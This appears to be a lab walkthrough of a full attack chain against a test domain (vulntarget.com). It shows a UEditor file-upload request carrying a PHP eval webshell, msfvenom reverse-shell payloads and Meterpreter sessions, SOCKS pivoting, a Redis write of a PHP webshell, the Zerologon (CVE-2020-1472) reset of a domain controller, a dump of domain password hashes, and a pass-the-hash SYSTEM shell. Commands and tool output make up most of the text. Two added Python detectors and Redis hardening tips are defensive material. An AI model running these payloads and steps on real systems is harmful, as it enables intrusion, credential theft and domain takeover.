Win 7 access
Getting a shell through the arbitrary file upload
POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.159.129
Content-Length: 882

------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileFieldName]"

filename
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"

10000
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[filePathFormat]"

R4g1729585588321
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"

.php
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="mufile"

submit
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="filename"; filename="R4g1729585588321.php"

R4g1729585588321<?php class Gz5SfY10 { public function __construct($H7Es8){ @eval("/*Z7y11Eib8N*/".$H7Es8.""); }}new Gz5SfY10($_REQUEST['cmd']);?>
------WebKitFormBoundarymVk33liI64J7GQaK--
Of course, you can also just let a tool do the whole thing.
Win 2016 access
Bring Win7 online in CS (Cobalt Strike) as a fallback
Generating the CS payload
Set up a listener
Generate an exe payload
Upload it with AntSword and run it; the host checks in.
Redis unauthenticated access getshell
Getting a session in MSF
Generate a reverse payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.159.128 LPORT=5555 -f exe > /root/555.exe
Upload and run it via AntSword, with msf listening
┌──(root㉿kali)-[~]
└─# msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.159.128
lhost => 192.168.159.128
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.159.128:5555
[*] Sending stage (176198 bytes) to 192.168.159.129
[*] Meterpreter session 1 opened (192.168.159.128:5555 -> 192.168.159.129:56385) at 2024-10-23 20:11:15 +0800
meterpreter > ls
Listing: C:\tmp
===============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  73802  fil   2024-10-23 20:06:58 +0800  555.exe

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) >
Add a route, set up a SOCKS proxy, and use arp to find internal hosts on the same subnet
msf6 auxiliary(server/socks_proxy) > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set session 1
session => 1
msf6 post(multi/manage/autoroute) > run
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[*] Did not find any new subnets to add.
[*] Post module execution completed
msf6 post(multi/manage/autoroute) > options

Module options (post/multi/manage/autoroute):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      autoadd          yes       Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
   NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
   SESSION  1                yes       The session to run this module on
   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)

View the full module info with the info, or info -d command.

msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > options

Module options (auxiliary/server/socks_proxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  1080             yes       The port to listen on
   VERSION  5                yes       The SOCKS version to use (Accepted: 4a, 5)

   When VERSION is 5:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   USERNAME                   no        Proxy username for SOCKS5 listener

Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server

View the full module info with the info, or info -d command.

msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 3.
[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > arp a

ARP cache
=========

    IP address       MAC address        Interface
    ----------       -----------        ---------
    10.0.20.1        00:50:56:c0:00:0b  Intel(R) PRO/1000 MT Network Connection #2
    10.0.20.99       00:0c:29:49:db:32  Intel(R) PRO/1000 MT Network Connection #2
    10.0.20.254      00:50:56:f2:92:e5  Intel(R) PRO/1000 MT Network Connection #2
    10.0.20.255      ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection #2
    192.168.159.1    00:50:56:c0:00:08  Intel(R) PRO/1000 MT Network Connection
    192.168.159.2    00:50:56:f4:36:2d  Intel(R) PRO/1000 MT Network Connection
    192.168.159.128  00:0c:29:cc:f9:72  Intel(R) PRO/1000 MT Network Connection
    192.168.159.254  00:50:56:fe:c6:0b  Intel(R) PRO/1000 MT Network Connection
    192.168.159.255  ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection
    224.0.0.22       00:00:00:00:00:00  Software Loopback Interface 1
    224.0.0.22       01:00:5e:00:00:16  Intel(R) PRO/1000 MT Network Connection
    224.0.0.22       01:00:5e:00:00:16  Intel(R) PRO/1000 MT Network Connection #2
    224.0.0.22       01:00:5e:00:00:16  Bluetooth 设备(个人区域网)
    224.0.0.252      00:00:00:00:00:00  Software Loopback Interface 1
    224.0.0.252      01:00:5e:00:00:fc  Intel(R) PRO/1000 MT Network Connection
    224.0.0.252      01:00:5e:00:00:fc  Intel(R) PRO/1000 MT Network Connection #2
    239.255.255.250  00:00:00:00:00:00  Software Loopback Interface 1
    239.255.255.250  01:00:5e:7f:ff:fa  Intel(R) PRO/1000 MT Network Connection
    239.255.255.250  01:00:5e:7f:ff:fa  Intel(R) PRO/1000 MT Network Connection #2
    255.255.255.255  ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection
    255.255.255.255  ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection #2
    255.255.255.255  ff:ff:ff:ff:ff:ff  Bluetooth 设备(个人区域网)
Edit the proxychains configuration
vi /etc/proxychains4.conf
Through the proxy, the unauthenticated Redis instance can be reached directly
Using unauthenticated Redis plus the PHP web environment to get a shell
Writing a webshell through the Redis unauthenticated access vulnerability
┌──(root㉿kali)-[~]
└─# proxychains redis-cli -h 10.0.20.99
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.20.99:6379 ... OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename tx.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['tx']);?>"
OK
10.0.20.99:6379> save
OK
10.0.20.99:6379>
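The three-step sequence above (CONFIG SET dir to the web root, CONFIG SET dbfilename to a .php name, then SAVE) is also the footprint a defender can look for in Redis MONITOR output. The detector below is an added example for this writeup, not part of the original; the MONITOR lines and client addresses are constructed.

```python
import re
import shlex
from collections import defaultdict

# One Redis MONITOR line looks like: 1729685001.202 [0 10.0.20.1:50512] "config" "set" "dir" "C:/..."
MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<argv>.*)$')
SCRIPT_EXTS = (".php", ".jsp", ".asp", ".aspx")

# Constructed sample feed modelled on the redis-cli session above; nothing here came from a real server.
SAMPLE_MONITOR_LINES = [
    '1729685000.101 [0 10.0.20.7:40122] "get" "session:42"',
    '1729685001.202 [0 10.0.20.1:50512] "config" "set" "dir" "C:/phpStudy/PHPTutorial/WWW/"',
    '1729685002.303 [0 10.0.20.1:50512] "config" "set" "dbfilename" "tx.php"',
    '1729685003.404 [0 10.0.20.1:50512] "set" "1" "<?php /* webshell body omitted */ ?>"',
    '1729685004.505 [0 10.0.20.1:50512] "save"',
    '1729685005.606 [0 10.0.20.7:40122] "bgsave"',
]

def parse_monitor_line(line):
    """Return (client, argv) for one MONITOR line, or None if the line is not in MONITOR format."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return m.group("client"), shlex.split(m.group("argv"))

def detect_rdb_webshell_writes(lines):
    """Flag each client that points the RDB dump at a script file and then forces SAVE/BGSAVE.

    A client that only changes dir, or that saves to a normal dump.rdb, is not reported.
    """
    pending = defaultdict(dict)   # client -> {"dir": ..., "dbfilename": ...} set so far
    alerts = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[1]:
            continue
        client, argv = parsed
        cmd = argv[0].lower()
        if cmd == "config" and len(argv) >= 4 and argv[1].lower() == "set":
            key = argv[2].lower()
            if key in ("dir", "dbfilename"):
                pending[client][key] = argv[3]
        elif cmd in ("save", "bgsave"):
            fname = pending[client].get("dbfilename", "")
            if fname.lower().endswith(SCRIPT_EXTS):
                alerts.append({"client": client, "dbfilename": fname,
                               "dir": pending[client].get("dir", "<unchanged>")})
    return alerts
```

The same write primitive is removed at source by keeping Redis off public interfaces with protected-mode yes, setting requirepass, and renaming or disabling CONFIG with rename-command.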
Once the shell is written, connect to it with AntSword through the proxy
Getting it online in CS
Right-click Win7 and choose the pivot-listener option
Select the payload as shown in the figure and generate it
Once configured, a listener is created and started automatically
Gaining access to Win2019
msf bind (forward) connection through the proxy
Start msf through the proxy. Note that only when it is launched through the proxy (proxychains msfconsole) can its traffic reach the internal Win2016 host in the forward direction.
┌──(root㉿kali)-[/zbug]
└─# proxychains msfconsole
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Metasploit tip: After running db_nmap, be sure to check out the result
of hosts and services
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set rhost 10.0.20.99
rhost => 10.0.20.99
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 10.0.20.99:4444
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.20.99:4444 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.20.99:4444 ... OK
[*] Sending stage (201798 bytes) to 10.0.20.99
[*] Meterpreter session 1 opened (127.0.0.1:59614 -> 127.0.0.1:1080) at 2025-03-09 15:30:20 +0800
meterpreter >
Run the payload via AntSword and the session comes in
Add the route chain
meterpreter > run post/multi/manage/autoroute
[*] Running module against WIN2016
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
meterpreter > run post/windows/gather/enum_domain
[+] Domain FQDN: vulntarget.com
[+] Domain NetBIOS Name: VULNTARGET
[+] Domain Controller: win2019.vulntarget.com (IP: 10.0.10.110)
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set version 5
version => 5
msf6 auxiliary(server/socks_proxy) > set srvport 1081
srvport => 1081
msf6 auxiliary(server/socks_proxy) > options

Module options (auxiliary/server/socks_proxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  1081             yes       The port to listen on
   VERSION  5                yes       The SOCKS version to use (Accepted: 4a, 5)

   When VERSION is 5:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   USERNAME                   no        Proxy username for SOCKS5 listener

Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server

View the full module info with the info, or info -d command.

msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) >
With that in place, go on to update the proxychains config file
vi /etc/proxychains4.conf
Test whether the chain works with nmap
┌──(root㉿kali)-[/zbug]
└─# proxychains nmap -Pn -sT 10.0.10.110 -p6379,80,8080,445,139
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-09 18:56 CST
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:139 ... OK
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:8080 <--socket error or timeout!
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:80 <--socket error or timeout!
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:445 ... OK
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:6379 <--socket error or timeout!
Nmap scan report for 10.0.10.110
Host is up (0.14s latency).

PORT     STATE  SERVICE
80/tcp   closed http
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
6379/tcp closed redis
8080/tcp closed http-proxy

Nmap done: 1 IP address (1 host up) scanned in 45.37 seconds
Exploiting CVE-2020-1472
git clone https://github.com/dirkjanm/CVE-2020-1472.git
git clone https://github.com/SecureAuthCorp/impacket.git && cd impacket && pip3 install .
Once downloaded, use CVE-2020-1472 to reset the domain controller's machine account password to an empty string
┌──(root㉿kali)-[/zbug/CVE-2020-1472]
└─# proxychains python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Performing authentication attempts...
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:135 ... OK
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:49670 ... OK
=========================================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
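On the domain controller, the reset above is recorded as Security event 4742 ("A computer account was changed") whose subject is ANONYMOUS LOGON and whose Password Last Set attribute changed, which is the commonly used detection heuristic for this CVE. The checker below is an added example, not part of the original writeup; the field names follow the 4742 event XML and every record is constructed.

```python
# Field names follow the Windows Security event 4742 ("A computer account was changed") as
# exported from the event XML; the records below are constructed for this example.
ANONYMOUS_LOGON_SID = "S-1-5-7"

SAMPLE_EVENTS = [
    # constructed: routine machine-password rotation, performed by the computer account itself
    {"EventID": 4742, "Computer": "win2019.vulntarget.com",
     "SubjectUserSid": "S-1-5-21-1111111111-2222222222-3333333333-1602",
     "SubjectUserName": "WIN2016$", "TargetUserName": "WIN2016$",
     "PasswordLastSet": "3/1/2025 02:10:11"},
    # constructed: an admin edits another attribute; the password field shows "-" (unchanged)
    {"EventID": 4742, "Computer": "win2019.vulntarget.com",
     "SubjectUserSid": "S-1-5-21-1111111111-2222222222-3333333333-500",
     "SubjectUserName": "Administrator", "TargetUserName": "WIN2019$",
     "PasswordLastSet": "-"},
    # constructed: what the CVE-2020-1472 reset above leaves behind on the DC
    {"EventID": 4742, "Computer": "win2019.vulntarget.com",
     "SubjectUserSid": ANONYMOUS_LOGON_SID,
     "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "WIN2019$",
     "PasswordLastSet": "3/9/2025 19:02:47"},
    # constructed: unrelated logon event with an anonymous subject, must not match
    {"EventID": 4624, "Computer": "win2019.vulntarget.com",
     "SubjectUserSid": ANONYMOUS_LOGON_SID, "TargetUserName": "WIN2019$"},
]

def is_zerologon_like(event):
    """True for a 4742 in which a machine account's password was set by ANONYMOUS LOGON.

    A legitimate rotation is performed by the computer account itself (or by an authenticated
    admin); an unauthenticated caller resetting a computer password is the exploit's footprint.
    """
    if event.get("EventID") != 4742:
        return False
    if not event.get("TargetUserName", "").endswith("$"):
        return False                          # a user, not a computer, account
    if event.get("PasswordLastSet", "-") == "-":
        return False                          # this change did not touch the password
    return event.get("SubjectUserSid") == ANONYMOUS_LOGON_SID

def find_zerologon_events(events):
    """Return the matching events so the caller can alert on Computer and TargetUserName."""
    return [e for e in events if is_zerologon_like(e)]
```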
Use secretsdump.py (found in the impacket/examples directory) to dump the domain Administrator hash from the DC
┌──(root㉿kali)-[/zbug/impacket/examples]
└─# proxychains4 python3 secretsdump.py vulntarget.com/WIN2019\$@10.0.10.110 -just-dc -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:445 ... OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:135 ... OK
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:49667 ... OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:9630d035ba860e59ca7a51ea39a48e97:::
[*] Kerberos keys grabbed
[*] Cleaning up...
Successfully obtained:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
In the same directory, use smbexec.py to get a shell on the domain controller
┌──(root㉿kali)-[/zbug/impacket/examples]
└─# proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:445 ... OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system